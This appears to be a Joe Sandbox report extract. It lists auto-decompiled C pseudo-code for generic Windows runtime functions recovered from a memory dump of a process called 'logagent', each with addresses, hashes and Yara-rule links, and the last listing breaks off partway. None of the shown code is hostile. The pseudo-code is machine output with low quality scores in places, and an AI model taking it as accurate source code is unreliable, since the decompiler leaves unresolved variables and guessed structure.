                                              C-Code - Quality: 61%
                                              			E0527138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x52ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E051FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E051D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                              0x0527138a
                                              0x0527138a
                                              0x05271399
                                              0x052713a3
                                              0x052713a8
                                              0x052713aa
                                              0x052713b5
                                              0x052713bb
                                              0x052713c3
                                              0x052713c6
                                              0x052713c9
                                              0x052713d4
                                              0x052713e6
                                              0x052713d6
                                              0x052713df
                                              0x052713df
                                              0x052713f1
                                              0x052713f2
                                              0x052713f4
                                              0x052713f9
                                              0x0527140e

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e594284f221a06e23f7ac4f52949c9cc4b20665e32615034d1209d5cee2f749d
                                              • Instruction ID: af764340e61dc5cfffbb478be3b0710ec73d33283827ee5a87fcb3c1d1244974
                                              • Opcode Fuzzy Hash: e594284f221a06e23f7ac4f52949c9cc4b20665e32615034d1209d5cee2f749d
                                              • Instruction Fuzzy Hash: 0E015E71E1421CAFCB14EFA9D846FAEBBB8EF44710F404066B905EB381DB749A15CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B58EC Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E051B58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x52ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x5195c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E051B5943() != 0 &&  *0x52a5320 > 5) {
					E05237B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05237B5E( &_v28, _t28);
					_t11 = E05237B9C(0x52a5320, 0x519bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E051FB640(_t11, _t17, _v8 ^ _t29, 0x519bf15, _t27, _t28);
			}















                                              0x051b58fb
                                              0x051b58fe
                                              0x051b5906
                                              0x051b590a
                                              0x051b593c
                                              0x051b593c
                                              0x051b590c
                                              0x051b590c
                                              0x051b5911
                                              0x00000000
                                              0x051b5913
                                              0x051b5913
                                              0x051b5913
                                              0x051b5911
                                              0x051b591d
                                              0x05211035
                                              0x0521103c
                                              0x0521103f
                                              0x05211056
                                              0x05211056
                                              0x051b593b

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9cfc0a0cdea5815b60cc8befba6585e30541c113d732a9e5beb8df4131266d8c
                                              • Instruction ID: e3e878cf52c27c15a3f760cb026b6582770b6c73b3031b92a1aed906854efcf1
                                              • Opcode Fuzzy Hash: 9cfc0a0cdea5815b60cc8befba6585e30541c113d732a9e5beb8df4131266d8c
                                              • Instruction Fuzzy Hash: 9401F771B141049BDB18DB25D8459EF77BAEF80230F8A0069E905A7241EF70DD01CA94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CB02A Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051CB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E051D7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05237016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                              0x051cb037
                                              0x051cb039
                                              0x051cb03b
                                              0x051cb040
                                              0x0521a60e
                                              0x00000000
                                              0x00000000
                                              0x0521a61d
                                              0x051cb04b
                                              0x051cb04e
                                              0x0521a627
                                              0x0521a634
                                              0x00000000
                                              0x00000000
                                              0x0521a641
                                              0x0521a653
                                              0x0521a643
                                              0x0521a64c
                                              0x0521a64c
                                              0x0521a65b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521a66c
                                              0x051cb057
                                              0x051cb057
                                              0x051cb057
                                              0x051cb046
                                              0x051cb046
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                              • Instruction ID: 92d8831c67aa3683aa0196d3e59c3b1bee102865ba66d2981fa97ca604954e2b
                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                              • Instruction Fuzzy Hash: BE01BC722199809FD726C71CC988F767BE9FF61740F0900E5F91ACBA91D729DC40C668
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05281074 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E05281074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0528165E(__ebx, 0x52a8ae4, (__edx -  *0x52a8b04 >> 0x14) + (__edx -  *0x52a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x52a8b04 >> 0x14) + (__edx -  *0x52a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0527AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E051D7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0526FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                              0x05281074
                                              0x05281080
                                              0x05281082
                                              0x0528108a
                                              0x0528108f
                                              0x05281093
                                              0x052810ab
                                              0x052810ab
                                              0x052810c3
                                              0x052810cf
                                              0x052810e1
                                              0x052810d1
                                              0x052810da
                                              0x052810da
                                              0x052810e9
                                              0x052810f5
                                              0x052810f5
                                              0x052810fe

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d432273f093ef9643cb0c75bc9fe0e7a47c62b4cc42d241543aaa9b997968f57
                                              • Instruction ID: ec957c5a237ccee59f726cffe75f025dfa6e887a60df6f10e284e6e379293187
                                              • Opcode Fuzzy Hash: d432273f093ef9643cb0c75bc9fe0e7a47c62b4cc42d241543aaa9b997968f57
                                              • Instruction Fuzzy Hash: 23014C726297429FC710EF68DD44B2A77E5BF84310F048519FC86836D1EE70D451CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0526FE3F Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E0526FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x52ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E051FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E051D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x0526fe3f
                                              0x0526fe3f
                                              0x0526fe4e
                                              0x0526fe58
                                              0x0526fe5d
                                              0x0526fe5f
                                              0x0526fe6a
                                              0x0526fe72
                                              0x0526fe75
                                              0x0526fe78
                                              0x0526fe83
                                              0x0526fe95
                                              0x0526fe85
                                              0x0526fe8e
                                              0x0526fe8e
                                              0x0526fea0
                                              0x0526fea1
                                              0x0526fea3
                                              0x0526fea8
                                              0x0526febd

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f3ce247a731892917b5ad8001a9eef8c046ee88d55c6c0a6945656b90e58be8
                                              • Instruction ID: 1ba3c341e6d2bc7ac67d1b6d8a66c84a017ad489b6c5e264bff620b9bd35ad62
                                              • Opcode Fuzzy Hash: 3f3ce247a731892917b5ad8001a9eef8c046ee88d55c6c0a6945656b90e58be8
                                              • Instruction Fuzzy Hash: 61018471E14208ABCB14EFA9D845FAEBBB8EF44710F004066F900AB381DA74D951CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0526FEC0 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E0526FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x52ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E051FFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E051D7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x0526fec0
                                              0x0526fec0
                                              0x0526fecf
                                              0x0526fed9
                                              0x0526fede
                                              0x0526fee0
                                              0x0526feeb
                                              0x0526fef3
                                              0x0526fef6
                                              0x0526fef9
                                              0x0526ff04
                                              0x0526ff16
                                              0x0526ff06
                                              0x0526ff0f
                                              0x0526ff0f
                                              0x0526ff21
                                              0x0526ff22
                                              0x0526ff24
                                              0x0526ff29
                                              0x0526ff3e

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3f45453837a8e2c1deaa83c7be8d0d59a63bdcc76f4fa6d0ca1d9baed10b5fe
                                              • Instruction ID: d3c34f74bdb4fa4e538ae4168991d8fcfa6ab2ff7af7f3ca9ca99e7bccb5b9f5
                                              • Opcode Fuzzy Hash: e3f45453837a8e2c1deaa83c7be8d0d59a63bdcc76f4fa6d0ca1d9baed10b5fe
                                              • Instruction Fuzzy Hash: C3018871A10249ABCB14DB69D845FAFB7B8EF45710F404066B9019B381DA749951C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288A62 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E05288A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x52ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E051D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E051FB640(E051F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                              0x05288a62
                                              0x05288a71
                                              0x05288a79
                                              0x05288a82
                                              0x05288a85
                                              0x05288a89
                                              0x05288a8c
                                              0x05288a8f
                                              0x05288a92
                                              0x05288a95
                                              0x05288a9f
                                              0x05288ab1
                                              0x05288aa1
                                              0x05288aaa
                                              0x05288aaa
                                              0x05288abc
                                              0x05288abd
                                              0x05288abf
                                              0x05288ac4
                                              0x05288ada

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 30116c47f2c84b80ff2207d7726f1915fbac68718d8ebe1f670ac91c1ad8bad0
                                              • Instruction ID: d3a4f4a1b4c01705ceff852c979fce47fa4729e220c8c7a72942bb2230861a84
                                              • Opcode Fuzzy Hash: 30116c47f2c84b80ff2207d7726f1915fbac68718d8ebe1f670ac91c1ad8bad0
                                              • Instruction Fuzzy Hash: FC012175A1121D9FCB04EFA9D9459AEB7B8FF48310F50405AF905E7381D734A900CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05288ED6 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E05288ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x52ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E051D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                              0x05288ed6
                                              0x05288ee5
                                              0x05288eed
                                              0x05288ef0
                                              0x05288efa
                                              0x05288f03
                                              0x05288f0c
                                              0x05288f15
                                              0x05288f24
                                              0x05288f27
                                              0x05288f31
                                              0x05288f43
                                              0x05288f33
                                              0x05288f3c
                                              0x05288f3c
                                              0x05288f4e
                                              0x05288f4f
                                              0x05288f51
                                              0x05288f56
                                              0x05288f69

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e80ac376903367aa839ba47926a62d737e2f4477f772407252640b3a75ea16d
                                              • Instruction ID: 5f306f1ea71bab052fd69389a138fcfe01d4acbaa3aa4a5087bd40b9b1f5755a
                                              • Opcode Fuzzy Hash: 2e80ac376903367aa839ba47926a62d737e2f4477f772407252640b3a75ea16d
                                              • Instruction Fuzzy Hash: 13111E70A152099FDB04EFA9D445BAEFBF4FF08300F4442AAE519EB782E7349940CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BDB60 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E051BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E051BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L051BE8B0(__ecx, _t14, 0xfff);
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                              0x051bdb64
                                              0x051bdb66
                                              0x051bdb6b
                                              0x051bdbaa
                                              0x051bdb71
                                              0x051bdb76
                                              0x051bdb7a
                                              0x051bdba3
                                              0x051bdb7c
                                              0x051bdb87
                                              0x051bdb8b
                                              0x05214fa1
                                              0x05214fb3
                                              0x05214fb8
                                              0x051bdb91
                                              0x051bdb96
                                              0x051bdb98
                                              0x051bdb98
                                              0x051bdb8b
                                              0x051bdb7a
                                              0x051bdb9d
                                              0x051bdba2

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction ID: 1353f880462439954e5a6b9e8d6f4b468daaff8f64a7dfe7dd8093d956163090
                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                              • Instruction Fuzzy Hash: 76F0C8332055229BF73A6A5599C4FE7A6AA9F83B60F160035F1059B344CFE4880286E5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BB1E1 Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E051D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E051D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E05237016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                              0x051bb1e8
                                              0x051bb1ea
                                              0x051bb1f3
                                              0x05214a17
                                              0x051bb1f9
                                              0x051bb1f9
                                              0x051bb1f9
                                              0x051bb201
                                              0x05214a21
                                              0x05214a2e
                                              0x00000000
                                              0x00000000
                                              0x05214a3b
                                              0x05214a4d
                                              0x05214a3d
                                              0x05214a46
                                              0x05214a46
                                              0x05214a55
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051bb20a
                                              0x051bb20a
                                              0x051bb20a
                                              0x051bb20a

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction ID: 126d0c9273c855d1dba05a1a3f1c220b2c62a145f8c7d26bfe59ea3d74e82e84
                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                              • Instruction Fuzzy Hash: 2901D6366145809BDB22A759C808FAABBDAFF55750F0A00A1FD198B6B1D7B4E800C368
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0524FE87 Relevance: .0, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E0524FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x52ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E051D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                              0x0524fe96
                                              0x0524fe9e
                                              0x0524fea1
                                              0x0524fead
                                              0x0524feb3
                                              0x0524feb9
                                              0x0524fec3
                                              0x0524fed5
                                              0x0524fec5
                                              0x0524fece
                                              0x0524fece
                                              0x0524fee0
                                              0x0524fee1
                                              0x0524fee3
                                              0x0524fee8
                                              0x0524fefb

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e851642e6b5a2bea8b1f0e4ec443034e261d827c4751166de6fc77722bc78ac8
                                              • Instruction ID: 710a4cc2a6a11e6a48a96a22bfe3169453c2b74611a7068318b4294e72eb8c1a
                                              • Opcode Fuzzy Hash: e851642e6b5a2bea8b1f0e4ec443034e261d827c4751166de6fc77722bc78ac8
                                              • Instruction Fuzzy Hash: 5B016271A14209EFCB14DFA8D546A6EB7F4FF04300F104159F505DB382DA35E901CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527131B Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 48%
                                              			E0527131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x52ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E051D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                              0x0527131b
                                              0x0527132a
                                              0x05271330
                                              0x05271336
                                              0x0527133e
                                              0x05271341
                                              0x05271344
                                              0x0527134f
